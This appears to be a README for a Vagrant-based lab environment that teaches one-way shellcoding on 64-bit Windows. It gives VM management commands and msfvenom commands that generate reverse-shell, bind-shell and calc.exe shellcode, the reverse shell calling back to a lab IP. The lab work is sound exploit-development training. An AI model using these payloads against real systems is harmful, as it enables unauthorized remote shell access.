# ⚔️ Implementation of One-Way Shellcoding in Windows 64bit Systems
## Vagrant Commands
### To start the environment
```
vagrant up
```
### To shutdown the environment
```
vagrant halt
```
### To reload the environment
```
vagrant reload
```
### To destroy the environment
```
vagrant destroy
```
## Payloads
### windows x64 reverse shell
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.33.100 LPORT=8888 -f c
```
### windows x64 calculator shell
```
msfvenom -p windows/x64/exec CMD=calc.exe -f c
```
### windows x64 bind shell
```
msfvenom -p windows/x64/shell_bind_tcp EXITFUNC=thread LPORT=4444 -f c
```
## 💡 Tips
* To copy any data into the Virtual Machines, place the files in the root folder of the repository at the laptop.
_* The files can then be accessed from the /vagrant/ (in Kali) or C:/vagrant/ (in Windows7) *_
* If the virtualbox VM's display is very small. Select the "View" in the menu -> "Virtual Screen 1" option -> "Scale to 200%" option.
###### tags: `shellcoding` `exploit-dev` `64bit` `windows`